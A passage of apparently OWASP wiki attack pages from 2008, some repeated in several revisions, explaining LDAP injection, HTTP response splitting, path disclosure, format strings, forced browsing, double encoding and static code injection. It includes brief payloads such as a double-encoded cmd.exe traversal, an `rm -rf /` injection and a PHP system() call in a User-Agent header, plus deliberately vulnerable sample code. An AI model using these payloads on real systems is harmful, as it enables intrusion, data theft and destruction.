On line 11, the variable userName is initialized and validated to check if it’s not in blank. Then, the content of this variable is used to construct a LDAP query used by SearchFilter on line 28. The attacker has the chance specify what will be queried on LDAP server, and see the result on the line 33 to 41, are all results and their attributes are displayed.

Commented vulnerable asp code:
<nowiki>
1. <html>
2. <body>
3. <%@ Language=VBScript %>
4. <%
5. Dim userName
6. Dim filter
7. Dim ldapObj
8.
9. Const LDAP_SERVER = "ldap.example"
10.
11. userName = Request.QueryString("user")
12.
13. if( userName = "" ) then
14. Response.Write("Invalid request. Please specify a valid
15. user name")
16. Response.End()
17. end if
18.
19. filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry
20.
21. 'Creating the LDAP object and setting the base dn
22. Set ldapObj = Server.CreateObject("IPWorksASP.LDAP")
23. ldapObj.ServerName = LDAP_SERVER
24. ldapObj.DN = "ou=people,dc=spilab,dc=com"
25.
26. 'Setting the search filter
27. ldapObj.SearchFilter = filter
28.
29. ldapObj.Search
30.
31. 'Showing the user information
32. While ldapObj.NextResult = 1
33. Response.Write("<p>")
34.
35. Response.Write("<b><u>User information for: " +
36. ldapObj.AttrValue(0) + "</u></b><br>")
37. For i = 0 To ldapObj.AttrCount -1
38. Response.Write("<b>" + ldapObj.AttrType(i) +"</b>: " +
39. ldapObj.AttrValue(i) + "<br>" )
40. Next
41. Response.Write("</p>")
42. Wend
43. %>
44. </body>
45. </html> </nowiki>

In the example above, we send the * character in the user parameter which will result in the filter variable in the code to be initialized with (uid=*). The resulting LDAP statement will make the server return any object that contains a uid attribute like username.

<nowiki> http://www.some-site.org/index.asp?user=* </nowiki>

==Related [[Threat Agents]]==

* [[:Category: Insider]]

==Related [[Attacks]]==

*[[Interpreter Injection]]
*[[SQL Injection]]
*[[Command Injection]]
*[[Relative Path Traversal]]
*[[Resource Injection]]
*[[Path Manipulation]]

==Related [[Vulnerabilities]]==

[[:Category:Input Validation Vulnerability]]

==Related [[Controls]]==

[[:Category:Input Validation]]

==References==

* http://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf

* http://www.ietf.org/rfc/rfc1960.txt A String Representation of LDAP Search Filters (RFC1960)

* http://www.redbooks.ibm.com/redbooks/SG244986.html IBM RedBooks - Understanding LDAP

* http://www.webappsec.org/projects/threat/classes/ldap_injection.shtml

[[Category:Injection]]
[[Category:Attack]]
__NOTOC__

LDAP injection

2008-07-02T11:30:22Z

Edualves: /* Related Threat Agents */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it’s possible to modify LDAP statements using a local proxy. This could result in the execution of arbitrary command such as granting permissions to unauthorized queries, and content modification inside the LDAP tree.
The same advanced exploitation techniques available in SQL Injection can be similarly applied in LDAP Injection.

==Examples==

===Example 1===
In a page with a user search form, the following code is responsible to catch input value and generate a LDAP query that will be used in LDAP database.

<input type="text" size=20 name="userName">Insert the username</input>

The LDAP query is narrowed down for performance and the underlying code for this function might be the following:
String ldapSearchQuery = "(cn=" + $userName + ")";
System.out.println(ldapSearchQuery);

Case the variable $userName is not validated, it could be possible accomplish LDAP injection, as follows:
*If a user puts “*” on box search, the system may return all the usernames on the LDAP base
*If a user puts “jonys) (| (password = * ) )”, it will generate the code bellow revealing jonys’ password
( cn = jonys ) ( | (password = * ) )

===Example 2===
The following vulnerable code is used in an ASP web application which provides login with LDAP data base.
On line 11, the variable userName is initialized and validated to check if it’s not in blank. Then, the content of this variable is used to construct a LDAP query used by SearchFilter on line 28. The attacker has the chance specify what will be queried on LDAP server, and see the result on the line 33 to 41, are all results and their attributes are displayed.

Commented vulnerable asp code:
<nowiki>
1. <html>
2. <body>
3. <%@ Language=VBScript %>
4. <%
5. Dim userName
6. Dim filter
7. Dim ldapObj
8.
9. Const LDAP_SERVER = "ldap.example"
10.
11. userName = Request.QueryString("user")
12.
13. if( userName = "" ) then
14. Response.Write("Invalid request. Please specify a valid
15. user name")
16. Response.End()
17. end if
18.
19. filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry
20.
21. 'Creating the LDAP object and setting the base dn
22. Set ldapObj = Server.CreateObject("IPWorksASP.LDAP")
23. ldapObj.ServerName = LDAP_SERVER
24. ldapObj.DN = "ou=people,dc=spilab,dc=com"
25.
26. 'Setting the search filter
27. ldapObj.SearchFilter = filter
28.
29. ldapObj.Search
30.
31. 'Showing the user information
32. While ldapObj.NextResult = 1
33. Response.Write("<p>")
34.
35. Response.Write("<b><u>User information for: " +
36. ldapObj.AttrValue(0) + "</u></b><br>")
37. For i = 0 To ldapObj.AttrCount -1
38. Response.Write("<b>" + ldapObj.AttrType(i) +"</b>: " +
39. ldapObj.AttrValue(i) + "<br>" )
40. Next
41. Response.Write("</p>")
42. Wend
43. %>
44. </body>
45. </html> </nowiki>

In the example above, we send the * character in the user parameter which will result in the filter variable in the code to be initialized with (uid=*). The resulting LDAP statement will make the server return any object that contains a uid attribute like username.

<nowiki> http://www.some-site.org/index.asp?user=* </nowiki>

==Related [[Threat Agents]]==

[[:Category: Insider]]

==Related [[Attacks]]==

*[[Interpreter Injection]]
*[[SQL Injection]]
*[[Command Injection]]
*[[Relative Path Traversal]]
*[[Resource Injection]]
*[[Path Manipulation]]

==Related [[Vulnerabilities]]==

[[:Category:Input Validation Vulnerability]]

==Related [[Controls]]==

[[:Category:Input Validation]]

==References==

* http://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf

* http://www.ietf.org/rfc/rfc1960.txt A String Representation of LDAP Search Filters (RFC1960)

* http://www.redbooks.ibm.com/redbooks/SG244986.html IBM RedBooks - Understanding LDAP

* http://www.webappsec.org/projects/threat/classes/ldap_injection.shtml

[[Category:Injection]]
[[Category:Attack]]
__NOTOC__

HTTP Response Splitting

2008-07-02T11:28:21Z

Edualves: /* Related Threat Agents */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

HTTP response splitting vulnerabilities occur when:

* Data enters a web application through an untrusted source, most frequently an HTTP request.
* The data is included in an HTTP response header sent to a web user without being validated for malicious characters.

As with many software security vulnerabilities, HTTP response splitting is a means to an end, not an end in itself. At its root, the vulnerability is straightforward: an attacker passes malicious data to a vulnerable application, and the application includes the data in an HTTP response header.

To mount a successful exploit, the application must allow input that contains CR (carriage return, also given by %0d or \r) and LF (line feed, also given by %0a or \n)characters into the header. These characters not only give attackers control of the remaining headers and body of the response the application intends to send, but also allows them to create additional responses entirely under their control.

==Examples==

The following code segment reads the name of the author of a weblog entry, author, from an HTTP request and sets it in a cookie header of an HTTP response.

<pre>
String author = request.getParameter(AUTHOR_PARAM);
...
Cookie cookie = new Cookie("author", author);
cookie.setMaxAge(cookieExpiration);
response.addCookie(cookie);
</pre>

Assuming a string consisting of standard alpha-numeric characters, such as "Jane Smith", is submitted in the request the HTTP response including this cookie might take the following form:

<pre>
HTTP/1.1 200 OK
...
Set-Cookie: author=Jane Smith
...
</pre>

However, because the value of the cookie is formed of unvalidated user input the response will only maintain this form if the value submitted for AUTHOR_PARAM does not contain any CR and LF characters. If an attacker submits a malicious string, such as "Wiley Hacker\r\nHTTP/1.1 200 OK\r\n...", then the HTTP response would be split into two responses of the following form:

<pre>
HTTP/1.1 200 OK
...
Set-Cookie: author=Wiley Hacker

HTTP/1.1 200 OK
...
</pre>

Clearly, the second response is completely controlled by the attacker and can be constructed with any header and body content desired. The ability of attacker to construct arbitrary HTTP responses permits a variety of resulting attacks, including: cross-user defacement, web and browser cache poisoning, cross-site scripting and page hijacking.

==Related [[Threat Agents]]==

[[:Category: Insider]]

==Related [[Attacks]]==

*[[Cross-User Defacement]]
*[[Cache Poisoning]]
*[[Cross-Site Scripting]]
*[[Page Hijacking]]

==Related [[Vulnerabilities]]==

[[:Category:Input Validation Vulnerability]]

==Related [[Controls]]==

[[:Category:Input Validation]]

==References==

* http://www.infosecwriters.com/text_resources/pdf/HTTP_Response.pdf - HTTP Response Spliting

* http://www.securiteam.com/securityreviews/5WP0E2KFGK.html - Introdution to HTTP Response Spliting

* Watchfire Whitepaper: HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics Whitepaper[http://download.watchfire.com/ttl/wp/HTTPResponseSplitting.pdf?file=HTTPResponseSplitting.pdf&authToken=1214447561_257e36e250a83a8e5942584866d295ee]

==Credit==

{{Template:Fortify}}

[[Category: Protocol Manipulation]]

[[Category: Attack]]

__NOTOC__

Full Path Disclosure

2008-07-02T11:25:37Z

Edualves: /* Related Threat Agents */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

Full Path Disclosure (AKA, FPD) vulnerabilities enable the attacker to see the path to the webroot/file. Eg: /home/omg/htdocs/file/.
Certain vulnerabilities such as using the load_file() (within an SQL injection) query to view page sources require the attacker to have the full path to the file they wish to view.

==Examples==

* '''Empty Array'''

If we have a site that uses a method of requesting a page like this:
<pre>http://site.com/index.php?page=about</pre>
We can use a method of opening and closing braces and causing the page to output an error. This method would look like this:
<pre>http://site.com/index.php?page[]=about</pre>
This renders the page defunct thus spitting out an error:
<pre>Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84
Warning: pg_num_rows(): supplied argument ... in /usr/home/example/html/pie/index.php on line 131</pre>

* '''Null Session Cookie'''

Another popular and very reliable method of producing errors containing a FPD is to give the page a nulled session using Javascript Injections.
A simple injection using this method would look something like so:
<pre>javascript:void(document.cookie="PHPSESSID=");</pre>
By simply setting the PHPSESSID cookie to nothing (null) we get an error.
<pre>Warning: session_start() [function.session-start]: The session id contains illegal characters,
valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2</pre>

==Related [[Threat Agents]]==

[[:Category: Insider]]

==Related [[Attacks]]==

*[[SQL Injection]]
*[[Relative Path Traversal]]

==Related [[Vulnerabilities]]==

==Related [[Controls]]==

This vulnerability is prevented simply by turning error reporting off so your code does not spit out errors.
<pre>error_reporting(0);</pre>

==References==

* http://www.acunetix.com/vulnerabilities/Full-path-disclosure.htm

*[http://www.enigmagroup.org/ Articled summarised from Full Path Disclosure article by haZed on EnigmaGroup.org.]

*[http://www.enigmagroup.org/pages/view_articles/artID/175/ Original article location (registration required).]

[[Category:Injection]]
[[Category:Attack]]
__NOTOC__

Format string attack

2008-07-02T11:24:51Z

Edualves: /* Related Threat Agents */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

The Format String exploit occurs when the submitted data of an input string is evaluated as a command by the application. This way, the attacker could execute code, read the stack or cause segmentation fault in the running application, causing new behaviors that could compromise the security or the stability of the system.

To understand the attack it’s necessary to explain the components that constitute it. They are:
•The '''Format Function''' is an ANSI C conversion function, like '''printf, fprintf''', which converts primitive variable of the programming language in a human readable string representation.

•The '''Format String''' is the argument of the Format Function and is an ASCII Z string which contains text and format parameters, like: '''printf ("The magic number is: %d\n", 1911)''';

•The '''Format String Parameter''', like '''%x %s''' defines the type of conversion of the format function.

The attack could be executed when the application doesn’t validate properly the submitted input. In this case if a Format Strings parameter, like %x, is inserted in the posted data, the string is parsed by the Format Function the conversion specified in the parameters is executed. However, the Format Function is expecting more arguments as input, and if these arguments are not supplied, the function could read or write the stack.

This way is possible to define a well crafted input that could change the behavior of the format function permitting the attacker to cause deny of service or to execute arbitrary commands.

If the application uses Format Functions in the source-code which is able to interpret formatting characters, the attacker could explore the vulnerability inserting formatting characters in a form of the website. For example, the '''printf''' function is used to print the username inserted in some fields of the page, the website could be vulnerable to this kind of attack, as showed below:

printf (userName);

Following some examples in the table 2 of Format Functions, which if not treated can expose the application to the Format String Attack.

{|border="1" cellpadding="20" cellspacing="0"
!Format function
!Description
|-
|fprint
|Writes the printf to a file
|-
|printf
|Output a formatted string
|-
|sprintf
|Prints into a string
|-
|snprintf
|Prints into a string checking the length
|-
|vfprintf
|Prints the a va_arg structure to a file
|-
|vprintf
|Prints the va_arg structure to stdout
|-
|vsprintf
|Prints the va_arg to a string
|-
|vsnprintf
|Prints the va_arg to a string checking the length
|}

'''Table 1. Format Functions'''

Below there are some format parameters which can be used and its consequences:

•"%x" Read data from the stack

•"%s" Read character strings from the process' memory

•"%n" Write an integer to locations in the process' memory

To discover whether the application is vulnerable to this type of attack, it´s necessary to verify if the format function accepts and parses the format string parameters show in the table 2.

Format strings parameters:
{|border="1" cellpadding="20" cellspacing="0"
!Parameters
!Output
!Passed as
|-
|%%
|% character (literal)
|Reference
|-
|%p
|External representation of a pointer to void
|Reference
|-
|%d
|Decimal
|Value
|-
|%c
|Character
|
|-
|%u
|Unsigned decimal
|Value
|-
|%x
|Hexadecimal
|Value
|-
|%s
|String
|Reference
|-
|%n
|Writes the number of characters into a pointer
|Reference
|}
'''Table 2. Common parameters use to Format String Attack.'''

==Examples==

===Example1===
The example has the intention to demonstrate how the application can behave when the format function does not receive the necessary treatments for the validation in the input of format string.

First it will be shown the application operating with normal behavior and normal inputs, then, the application operating when the attacker input the format string and the resultant behavior.

Below it will be presented the source-code used for the example.
#include <stdio.h>
#include <string.h>
#include <stlib.h>

int main (int argc, char **argv)
{
char buf [100]
int x = 1
snprintf ( buf, sizeof buf, argv [1] ) ;
buf [ sizeof buf -1 ] = 0
printf ( “Buffer size is: (%d) \nData input: %s \n” , strlen (buf) , buf ) ;
printf ( “X equals: %d/ in hex: %#x\nMemory address for x: (%p) \n” , x, x, &x) ;
return 0 ;
}

Next it will be presented the output that the program supplies when running with expected inputs. In this case the program received the string “Bob” as input and returned it in the output.

./formattest “Bob”

Buffer size is (16)
Data input : Bob
X equals: 1/ in hex: 0x1
Memory address for x (0xbffff73c)

Now the format string vulnerability will be explored. If the format string parameter “%x %x” is inserted in the input string, when the format function parses the argument, the output will display the name Bob, but instead of showing the %x string, the application will show the content of a memory address.

./formattest “Bob %x %x”

Buffer size is (27)
Data input : Bob bffff 8740
X equals: 1/ in hex: 0x1
Memory address for x (0xbffff73c)

The inputs Bob and the format strings parameters will be attributed to the variable buf inside of the code which should take place of the %s in the Data input. So now the printf argument looks like:

printf ( “Buffer size is: (%d) \n Data input: Bob %x %x \n” , strlen (buf) , buf ) ;

When the application prints the results, the format function will interpret the format strings inputs showing the content of a memory address.

==Example 2==
'''Denial of Service'''

In this case, when an invalid address of memory is requested, normally the program is terminated, taking this as an example in a function:

printf (userName);

The attacker could insert a sequence of format strings, making the program to show the memory address where a lot of other data are stored, then, the attacker increases the possibilities of the program to read an illegal address, crashing the program and causing its non-availability.

printf (%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s);

==Related [[Threat Agents]]==

[[:Category: Internal software developer]]

[[:Category: Outsourced software developer]]

[[:Category: Insider]]

[[:Category: Outsider]]

==Related [[Attacks]]==

[[Code Injection]]

==Related [[Vulnerabilities]]==

[[Buffer Overflow]]

==Related [[Controls]]==

[[:Category:Input Validation ]]

==References==

*http://www.webappsec.org/projects/threat/classes/format_string_attack.shtml

* http://en.wikipedia.org/wiki/Format_string_attack

*http://seclists.org/bugtraq/2005/Dec/0030.html

[[Category:Injection]]
[[Category:Attack]]
__NOTOC__

Format string attack

2008-07-02T11:23:53Z

Edualves: /* Related Threat Agents */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

The Format String exploit occurs when the submitted data of an input string is evaluated as a command by the application. This way, the attacker could execute code, read the stack or cause segmentation fault in the running application, causing new behaviors that could compromise the security or the stability of the system.

To understand the attack it’s necessary to explain the components that constitute it. They are:
•The '''Format Function''' is an ANSI C conversion function, like '''printf, fprintf''', which converts primitive variable of the programming language in a human readable string representation.

•The '''Format String''' is the argument of the Format Function and is an ASCII Z string which contains text and format parameters, like: '''printf ("The magic number is: %d\n", 1911)''';

•The '''Format String Parameter''', like '''%x %s''' defines the type of conversion of the format function.

The attack could be executed when the application doesn’t validate properly the submitted input. In this case if a Format Strings parameter, like %x, is inserted in the posted data, the string is parsed by the Format Function the conversion specified in the parameters is executed. However, the Format Function is expecting more arguments as input, and if these arguments are not supplied, the function could read or write the stack.

This way is possible to define a well crafted input that could change the behavior of the format function permitting the attacker to cause deny of service or to execute arbitrary commands.

If the application uses Format Functions in the source-code which is able to interpret formatting characters, the attacker could explore the vulnerability inserting formatting characters in a form of the website. For example, the '''printf''' function is used to print the username inserted in some fields of the page, the website could be vulnerable to this kind of attack, as showed below:

printf (userName);

Following some examples in the table 2 of Format Functions, which if not treated can expose the application to the Format String Attack.

{|border="1" cellpadding="20" cellspacing="0"
!Format function
!Description
|-
|fprint
|Writes the printf to a file
|-
|printf
|Output a formatted string
|-
|sprintf
|Prints into a string
|-
|snprintf
|Prints into a string checking the length
|-
|vfprintf
|Prints the a va_arg structure to a file
|-
|vprintf
|Prints the va_arg structure to stdout
|-
|vsprintf
|Prints the va_arg to a string
|-
|vsnprintf
|Prints the va_arg to a string checking the length
|}

'''Table 1. Format Functions'''

Below there are some format parameters which can be used and its consequences:

•"%x" Read data from the stack

•"%s" Read character strings from the process' memory

•"%n" Write an integer to locations in the process' memory

To discover whether the application is vulnerable to this type of attack, it´s necessary to verify if the format function accepts and parses the format string parameters show in the table 2.

Format strings parameters:
{|border="1" cellpadding="20" cellspacing="0"
!Parameters
!Output
!Passed as
|-
|%%
|% character (literal)
|Reference
|-
|%p
|External representation of a pointer to void
|Reference
|-
|%d
|Decimal
|Value
|-
|%c
|Character
|
|-
|%u
|Unsigned decimal
|Value
|-
|%x
|Hexadecimal
|Value
|-
|%s
|String
|Reference
|-
|%n
|Writes the number of characters into a pointer
|Reference
|}
'''Table 2. Common parameters use to Format String Attack.'''

==Examples==

===Example1===
The example has the intention to demonstrate how the application can behave when the format function does not receive the necessary treatments for the validation in the input of format string.

First it will be shown the application operating with normal behavior and normal inputs, then, the application operating when the attacker input the format string and the resultant behavior.

Below it will be presented the source-code used for the example.
#include <stdio.h>
#include <string.h>
#include <stlib.h>

int main (int argc, char **argv)
{
char buf [100]
int x = 1
snprintf ( buf, sizeof buf, argv [1] ) ;
buf [ sizeof buf -1 ] = 0
printf ( “Buffer size is: (%d) \nData input: %s \n” , strlen (buf) , buf ) ;
printf ( “X equals: %d/ in hex: %#x\nMemory address for x: (%p) \n” , x, x, &x) ;
return 0 ;
}

Next it will be presented the output that the program supplies when running with expected inputs. In this case the program received the string “Bob” as input and returned it in the output.

./formattest “Bob”

Buffer size is (16)
Data input : Bob
X equals: 1/ in hex: 0x1
Memory address for x (0xbffff73c)

Now the format string vulnerability will be explored. If the format string parameter “%x %x” is inserted in the input string, when the format function parses the argument, the output will display the name Bob, but instead of showing the %x string, the application will show the content of a memory address.

./formattest “Bob %x %x”

Buffer size is (27)
Data input : Bob bffff 8740
X equals: 1/ in hex: 0x1
Memory address for x (0xbffff73c)

The inputs Bob and the format strings parameters will be attributed to the variable buf inside of the code which should take place of the %s in the Data input. So now the printf argument looks like:

printf ( “Buffer size is: (%d) \n Data input: Bob %x %x \n” , strlen (buf) , buf ) ;

When the application prints the results, the format function will interpret the format strings inputs showing the content of a memory address.

==Example 2==
'''Denial of Service'''

In this case, when an invalid address of memory is requested, normally the program is terminated, taking this as an example in a function:

printf (userName);

The attacker could insert a sequence of format strings, making the program to show the memory address where a lot of other data are stored, then, the attacker increases the possibilities of the program to read an illegal address, crashing the program and causing its non-availability.

printf (%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s);

==Related [[Threat Agents]]==

[[:Category: Internal software developer]]

[[:Category: Outsourced software developer]]

==Related [[Attacks]]==

[[Code Injection]]

==Related [[Vulnerabilities]]==

[[Buffer Overflow]]

==Related [[Controls]]==

[[:Category:Input Validation ]]

==References==

*http://www.webappsec.org/projects/threat/classes/format_string_attack.shtml

* http://en.wikipedia.org/wiki/Format_string_attack

*http://seclists.org/bugtraq/2005/Dec/0030.html

[[Category:Injection]]
[[Category:Attack]]
__NOTOC__

Forced browsing

2008-07-02T11:17:57Z

Edualves: /* Related Threat Agents */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

Forced browsing is an attack that’s aim to enumerate and access resources that are not referenced by the application, but still can be accessible.

An attacker can use brute force techniques to search for unlinked contents in domain directory, such as temporary directories and files, old backup and configuration files. These resources may store sensitive information about web applications and operational system, such as source code, credentials, internal network addressing, and so on, thus being considered a valuable resource for intruders.

This attack should be performed manually when the application index directories and pages based on number generation or predictable values, or using automated tools for common files and directories names.

This attack is also known as Predictable Resource Location, File Enumeration, Directory Enumeration, and Resource Enumeration.

==Examples==

===Example 1===
This example presents a technique of Predictable Resource Location attack, which is based on a manual and oriented identification of resources by modifying URL parameters.
The user1 wants to check his on-line agenda that is done thru the following URL:

<nowiki> www.site-example.com/users/calendar.php/user1/20070715 </nowiki>

In the URL, it is possible to identify the username (“user1”) and the date (mm/dd/yyyy).If the user attempts to make a forced browsing attack, he could guess another user’s agenda by predicting user identification and date, as follow:

<nowiki> www.site-example.com/users/calendar.php/user6/20070716 </nowiki>

The attack can be considered successful upon accessing other user agenda. A bad implementation of the authorization mechanism also collaborated for this attack success.

===Example 2 ===
This example presents how to perform an attack of static directory and file enumeration using an automated tool.

A scanning tool, like [http://www.cirt.net/code/nikto.shtml | Nikto], has the ability to search for existent files and directories based on a database of well-know resources, such as:

/system/
/password/
/logs/
/admin/
/test/

When the tool receives and “HTTP 200” message it means that such resource was found and should be manually inspected for valuable information.

==Related [[Threat Agents]]==

[[:Category: Insider]]

==Related [[Attacks]]==

*[[Path Traversal]]
*[[Path Manipulation]]

==Related [[Vulnerabilities]]==

[[:Category:Access Control Vulnerability]]

==Related [[Controls]]==

[[:Category: Access Control]]

==References==

*Forceful Browsing – Imperva Application Data Security and Compliance - http://www.imperva.com/application_defense_center/glossary/forceful_browsing.html

*Parameter fuzzing and forced browsing – WebAppSec - http://seclists.org/webappsec/2006/q3/0182.html

*http://www.webappsec.org/projects/threat/classes/predictable_resource_location.shtml

*http://cwe.mitre.org/data/definitions/425.html

[[category:Resource Manipulation]]
[[Category:Attack]]
__NOTOC__

Double Encoding

2008-07-02T11:16:39Z

Edualves: /* Related Threat Agents */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

This attack technique consists of encode user request parameters twice in hexadecimal format in order to bypass security controls or cause unexpected behavior from application. It's possible because the webserver accept and process client requests in many encoded forms

By using double encoding it’s possible to bypass security filters that only decode user input once, being. the second decoding process executed by backend platform or modules that properly handle encoded data but don't have the corresponding security checks in place.

Attackers can inject double encoding in pathnames or query strings to bypass authentication schema and security filters in use by web application.

There are some common characters sets that are used in Web applications attacks. For example, in directory traversal attacks, it uses “../” (dot-dot-slash) , while in XSS attacks, it uses “<” and “>” characters. These characters give hexadecimal representation that differs from normal data.

For example, “../” (dot-dot-slash) characters represents %2E%2E%2f in hexadecimal representation. When the % symbol is encoded again, its representation in hexadecimal code is %25. The resultant from double encoding process ”../”(dot-dot-slash) would be %252E%252E%252F:

Hexadecimal encode of “../” represents "%2E%2E%2f"

Then encoding the “%” represents "%25"

Double encoding of “../” represents "%252E%252E%252F"

==Examples==

===Example 1 ===
This example presents an old well-know vulnerability found on IIS versions 4.0 and 5.0, where an attacker could bypass authorization schema and gain access to any file on the same drive as the web root directory due an issue on decoding mechanism. For more details about folder traversal vulnerability, see [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0333 CVE 2001-0333].

In this scenario, the victim has an published executable directory (e.g. cgi) that’s stored on the same partition of Windows system folder. An attacker could execute arbitrary commands on the web server by submitting the following URL:

Original URL:

<nowiki>http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\</nowiki>

However, the application uses a security check filter that refuses requests containing characters like “../”. By double encoding the URL, it’s possible to bypass security the filter:

Double encoded URL:

<nowiki>http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\ </nowiki>

===Example 2 ===
A double encoding URL can be used to exploit XSS attack in order to bypass a built-in XSS detection module. Depending on implementation, the first decoding process is performed by HTTP protocol and the resultant encoded URL will bypass XSS filter, since it has no mechanisms to improve detection. A simple example XSS would be:

<script>alert('XSS')</script>

This malicious code could be inserted into a vulnerable application, resulting in a alert window with message “XSS”. However the web application can have a character filter such as “< “, “>” and “/”, since they are used to perform web application attacks. The attacker could use double encoding technique to bypass the filter and exploit client’s session. The encoding process for this Java script is:

<table >

<tr>
<td colspan=30><b> Char </b></td>
<td colspan=40><b> Hex encode </b></td>
<td colspan=50%><b> Then encoding '%' </b></td>
<td colspan=50%><b> Double encode </b></td>
</tr>

<tr>
<td colspan=30> “<” </td>
<td colspan=40> “%3C” </td>
<td colspan=50%> “%25” </td>
<td colspan=50%> “%253C” </td>
</tr>

<tr>
<td colspan=30> “/” </td>
<td colspan=40> “%2F” </td>
<td colspan=50%> “%25” </td>
<td colspan=50%> “%252F” </td>
</tr>

<tr>
<td colspan=30> “>” </td>
<td colspan=40> “%3E” </td>
<td colspan=50%> “%25” </td>
<td colspan=50%> “%253E” </td>
</tr>

</table>

Finally, the malicious double encoding code is:

%253Cscript%253Ealert('XSS')%253C%252Fscript%253E

==Related [[Threat Agents]]==

[[:Category: Insider]]

[[:Category: Staff]]

==Related [[Attacks]]==

*[[SQL Injection]]
*[[XSS Attacks]]
*[[Path Traversal]]

==Related [[Vulnerabilities]]==

[[:Category: Input Validation]]

==Related [[Controls]]==

[[:Category:Input Validation]]

==References==

* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1945

* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0054

[[Category:Resource Manipulation]]
[[Category:Attack]]
__NOTOC__

Direct Static Code Injection

2008-07-02T11:15:44Z

Edualves: /* Related Threat Agents */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

Direct Static Code Injection attack consists on injecting code directly onto the resource used by application while processing a user request. This is normally performed by tampering libraries and template files which are created based on user input without proper data sanitization.
Upon a user request to the modified resource, the actions defined on it will be executed at server side in the context of web server process.

[[Server-Side Includes (SSI) Injection | Server Side Includes]] is considered a type of direct static code injection. It should not be confused with other types of code injection, like [[Cross Site Scripting | XSS]] (“Cross Site Scripting” or “HTML injection”) where the code is executed on client side.

==Examples==

===Example 1===
This is a simple example of exploitation of CGISCRIPT.NET csSearch 2.3 vulnerability, published on Bugtraq ID: 4368.
By requesting the following URL to the server, it’s possible to execute commands defined on ‘’’’setup’’’ variable.
<br>
csSearch.cgi?command=savesetup&setup=''PERL_CODE_HERE''
<br>
For the classical example, it can be used the following command to remove all files from “/” folder:
csSearch.cgi?command=savesetup&setup=`rm%20-rf%20/`

Note that the above command must be encoded in order to be accepted.

===Example 2===
This example exploits a vulnerability on Ultimate PHP Board (UPB) 1.9 (CVE-2003-0395), which allows an attacker to execute random php code. This happens because some user variables, like IP address and User-Agent, are stored in a file that is used by admin_iplog.php page to show user statistics. When an administrator browses this page, the previously injected code by a malicious request is executed.
The following example stores a malicious PHP code that will deface index.html page when administrator browses admin_iplog.php.
GET /board/index.php HTTP/1.0
User-Agent: <? system( "echo \'hacked\' > ../index.html" ); ?>

==Related [[Threat Agents]]==

[[:Category:Insider]]

[[:Category:Staff]]

==Related [[Attacks]]==

*[[Server-Side Includes (SSI) Injection | Server Side Includes]]
*[[ Direct Dynamic Code Evaluation ('Eval Injection')]]

==Related [[Vulnerabilities]]==

[[:Category:Input Validation Vulnerability]]

==Related [[Controls]]==

[[:Category:Input Validation]]

[[Category:Injection]]
[[Category:Attack]]

==References==

* http://www.seclab.tuwien.ac.at/advisories/TUVSA-0510-001.txt

* http://marc.info/?l=bugtraq&m=105379741528925&w=2

* http://archives.neohapsis.com/archives/bugtraq/2005-06/0002.html

[[Category:Injection]]
[[Category:Attack]]
__NOTOC__

Direct Static Code Injection

2008-07-02T11:15:32Z

Edualves: /* Related Threat Agents */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

Direct Static Code Injection attack consists on injecting code directly onto the resource used by application while processing a user request. This is normally performed by tampering libraries and template files which are created based on user input without proper data sanitization.
Upon a user request to the modified resource, the actions defined on it will be executed at server side in the context of web server process.

[[Server-Side Includes (SSI) Injection | Server Side Includes]] is considered a type of direct static code injection. It should not be confused with other types of code injection, like [[Cross Site Scripting | XSS]] (“Cross Site Scripting” or “HTML injection”) where the code is executed on client side.

==Examples==

===Example 1===
This is a simple example of exploitation of CGISCRIPT.NET csSearch 2.3 vulnerability, published on Bugtraq ID: 4368.
By requesting the following URL to the server, it’s possible to execute commands defined on ‘’’’setup’’’ variable.
<br>
csSearch.cgi?command=savesetup&setup=''PERL_CODE_HERE''
<br>
For the classical example, it can be used the following command to remove all files from “/” folder:
csSearch.cgi?command=savesetup&setup=`rm%20-rf%20/`

Note that the above command must be encoded in order to be accepted.

===Example 2===
This example exploits a vulnerability on Ultimate PHP Board (UPB) 1.9 (CVE-2003-0395), which allows an attacker to execute random php code. This happens because some user variables, like IP address and User-Agent, are stored in a file that is used by admin_iplog.php page to show user statistics. When an administrator browses this page, the previously injected code by a malicious request is executed.
The following example stores a malicious PHP code that will deface index.html page when administrator browses admin_iplog.php.
GET /board/index.php HTTP/1.0
User-Agent: <? system( "echo \'hacked\' > ../index.html" ); ?>

